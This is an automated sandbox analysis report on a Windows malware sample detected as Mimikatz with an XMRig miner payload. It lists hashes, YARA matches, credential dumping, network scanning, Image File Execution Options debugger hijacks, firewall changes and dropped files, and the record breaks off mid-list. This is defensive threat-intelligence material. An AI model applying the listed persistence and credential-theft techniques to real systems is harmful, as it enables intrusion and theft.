Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows10-2004_x64 -
resource
win10v2004-20240802-en -
resource tags
arch:x64arch:x86image:win10v2004-20240802-enlocale:en-usos:windows10-2004-x64system -
submitted
01-09-2024 09:51
Behavioral task
behavioral1
Sample
2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe
Resource
win7-20240705-en
Behavioral task
behavioral2
Sample
2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe
Resource
win10v2004-20240802-en
General
-
Target
2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe
-
Size
9.1MB
-
MD5
21d6730c7275eaf0c80253a5c9c46e6c
-
SHA1
43fa8f75681e7a0f1978cc711be1db189014efc1
-
SHA256
3370e16cdf3413f6ba1d18150342b9f16c351acbffbf954d5b954029dbde489b
-
SHA512
7c72cb250561452a810a500194cf3deb44339049c09b144a9e0ddec36515f0d92da1a6c402949b2526d65edc309534657cff25dc67df1ff5f284e8e9b9996efb
-
SSDEEP
196608:MxygkmknGzwHdOgEPHd9BRX/nivPlTXTYo:Y5jz0E51/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
description pid Process procid_target PID 1716 created 1656 1716 sabzgqz.exe 37 -
Contacts a large (19641) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
OS Credential Dumping: LSASS Memory 1 TTPs
Malicious access to Credentials History.
-
XMRig Miner payload 10 IoCs
resource yara_rule behavioral2/memory/1764-182-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-186-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-204-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-217-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-226-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-236-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-252-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-270-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-271-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig behavioral2/memory/1764-273-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp xmrig -
mimikatz is an open source tool to dump credentials on Windows 6 IoCs
resource yara_rule behavioral2/memory/4480-0-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/4480-4-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/files/0x00070000000234cd-6.dat mimikatz behavioral2/memory/1224-8-0x0000000000400000-0x0000000000A9B000-memory.dmp mimikatz behavioral2/memory/940-136-0x00007FF7279A0000-0x00007FF727A8E000-memory.dmp mimikatz behavioral2/memory/940-138-0x00007FF7279A0000-0x00007FF727A8E000-memory.dmp mimikatz -
Drops file in Drivers directory 3 IoCs
description ioc Process File opened for modification C:\Windows\system32\drivers\etc\hosts sabzgqz.exe File created C:\Windows\system32\drivers\npf.sys wpcap.exe File created C:\Windows\system32\drivers\etc\hosts sabzgqz.exe -
Event Triggered Execution: Image File Execution Options Injection 1 TTPs 40 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\certutil.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\perfmon.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\Regsvr32.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\cscript.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\rundll32.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WinSAT.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\icacls.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\regini.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\at.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\WmiPrvSE.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\netsh.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\reg.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wscript.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\sethc.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bitsadmin.exe sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\mshta.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\magnify.exe sabzgqz.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\takeown.exe\Debugger = "C:\\Windows\\system32\\svchost.exe" sabzgqz.exe -
Modifies Windows Firewall 2 TTPs 2 IoCs
pid Process 4404 netsh.exe 4480 netsh.exe -
Executes dropped EXE 29 IoCs
pid Process 1224 sabzgqz.exe 1716 sabzgqz.exe 4720 wpcap.exe 2780 cibtlluza.exe 940 vfshost.exe 3352 tbhauuzkz.exe 2576 xohudmc.exe 540 yqiwqa.exe 2860 sabzgqz.exe 1764 pcgcfj.exe 2256 tbhauuzkz.exe 3012 tbhauuzkz.exe 3156 tbhauuzkz.exe 2220 tbhauuzkz.exe 692 tbhauuzkz.exe 2228 tbhauuzkz.exe 2328 tbhauuzkz.exe 3428 tbhauuzkz.exe 1732 tbhauuzkz.exe 1576 tbhauuzkz.exe 2240 tbhauuzkz.exe 880 tbhauuzkz.exe 1272 tbhauuzkz.exe 1944 tbhauuzkz.exe 3832 tbhauuzkz.exe 3976 tbhauuzkz.exe 4960 tbhauuzkz.exe 732 sabzgqz.exe 3032 pejfeyype.exe -
Loads dropped DLL 12 IoCs
pid Process 4720 wpcap.exe 4720 wpcap.exe 4720 wpcap.exe 4720 wpcap.exe 4720 wpcap.exe 4720 wpcap.exe 4720 wpcap.exe 4720 wpcap.exe 4720 wpcap.exe 2780 cibtlluza.exe 2780 cibtlluza.exe 2780 cibtlluza.exe -
resource yara_rule behavioral2/files/0x000700000002351f-134.dat upx behavioral2/memory/940-136-0x00007FF7279A0000-0x00007FF727A8E000-memory.dmp upx behavioral2/memory/940-138-0x00007FF7279A0000-0x00007FF727A8E000-memory.dmp upx behavioral2/files/0x000700000002352a-141.dat upx behavioral2/memory/3352-142-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/3352-157-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/files/0x0007000000023527-167.dat upx behavioral2/memory/1764-169-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/2256-175-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/3012-179-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1764-182-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/3156-184-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1764-186-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/2220-189-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/692-194-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/2228-198-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/2328-202-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1764-204-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/3428-207-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1732-211-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1576-215-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1764-217-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/2240-220-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/880-224-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1764-226-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/1272-230-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1944-233-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/3832-235-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1764-236-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/3976-238-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/4960-240-0x00007FF636FB0000-0x00007FF63700B000-memory.dmp upx behavioral2/memory/1764-252-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/1764-270-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/1764-271-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx behavioral2/memory/1764-273-0x00007FF6C1C00000-0x00007FF6C1D20000-memory.dmp upx -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 93 ifconfig.me 94 ifconfig.me -
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData sabzgqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content sabzgqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE sabzgqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft sabzgqz.exe File opened for modification C:\Windows\SysWOW64\yqiwqa.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\DDAB91A53CE5876D153BF0B6B3BA7DCE sabzgqz.exe File created C:\Windows\system32\wpcap.dll wpcap.exe File created C:\Windows\SysWOW64\yqiwqa.exe xohudmc.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 sabzgqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\DDAB91A53CE5876D153BF0B6B3BA7DCE sabzgqz.exe File created C:\Windows\SysWOW64\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 sabzgqz.exe File created C:\Windows\system32\Packet.dll wpcap.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 sabzgqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies sabzgqz.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache sabzgqz.exe File created C:\Windows\SysWOW64\pthreadVC.dll wpcap.exe File created C:\Windows\SysWOW64\wpcap.dll wpcap.exe -
Drops file in Program Files directory 3 IoCs
description ioc Process File created C:\Program Files\WinPcap\rpcapd.exe wpcap.exe File created C:\Program Files\WinPcap\LICENSE wpcap.exe File created C:\Program Files\WinPcap\uninstall.exe wpcap.exe -
Drops file in Windows directory 60 IoCs
description ioc Process File created C:\Windows\tsmmkppcn\UnattendGC\specials\tucl-1.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\docmicfg.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\schoedcl.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\docmicfg.xml sabzgqz.exe File created C:\Windows\bipepyze\vimpcsvc.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\libeay32.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\ucl.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\mbklagvue\pejfeyype.exe sabzgqz.exe File opened for modification C:\Windows\bipepyze\sabzgqz.exe 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe File created C:\Windows\ime\sabzgqz.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\schoedcl.xml sabzgqz.exe File opened for modification C:\Windows\bipepyze\spoolsrv.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\mbklagvue\ip.txt sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\vimpcsvc.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\mbklagvue\Packet.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\exma-1.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\tibe-2.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\AppCapture64.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\AppCapture32.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\mbklagvue\scan.bat sabzgqz.exe File created C:\Windows\bipepyze\sabzgqz.exe 2024-09-01_21d6730c7275eaf0c80253a5c9c46e6c_hacktools_icedid_mimikatz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\cnli-1.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\svschost.xml sabzgqz.exe File created C:\Windows\bipepyze\svschost.xml sabzgqz.exe File created C:\Windows\bipepyze\schoedcl.xml sabzgqz.exe File opened for modification C:\Windows\tsmmkppcn\mbklagvue\Packet.dll sabzgqz.exe File created C:\Windows\bipepyze\spoolsrv.xml sabzgqz.exe File created C:\Windows\bipepyze\docmicfg.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\Corporate\mimidrv.sys sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\docmicfg.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\Corporate\vfshost.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\xdvl-0.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\zlib1.dll sabzgqz.exe File opened for modification C:\Windows\bipepyze\svschost.xml sabzgqz.exe File opened for modification C:\Windows\bipepyze\vimpcsvc.xml sabzgqz.exe File opened for modification C:\Windows\bipepyze\schoedcl.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\Corporate\mimilib.dll sabzgqz.exe File opened for modification C:\Windows\tsmmkppcn\Corporate\log.txt cmd.exe File opened for modification C:\Windows\tsmmkppcn\mbklagvue\Result.txt pejfeyype.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\libxml2.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\svschost.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\svschost.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\vimpcsvc.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\coli-0.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\Shellcode.ini sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\spoolsrv.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\posh-0.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\trfo-2.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\upbdrjv\swrpwe.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\mbklagvue\wpcap.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\vimpcsvc.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\trch-1.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\crli-0.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\ssleay32.dll sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\schoedcl.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\mbklagvue\wpcap.exe sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\spoolsrv.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\UnattendGC\specials\spoolsrv.xml sabzgqz.exe File opened for modification C:\Windows\bipepyze\docmicfg.xml sabzgqz.exe File created C:\Windows\tsmmkppcn\mbklagvue\cibtlluza.exe sabzgqz.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 1588 sc.exe 692 sc.exe 868 sc.exe 3208 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Event Triggered Execution: Netsh Helper DLL 1 TTPs 51 IoCs
Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.
description ioc Process Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh netsh.exe -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cibtlluza.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened 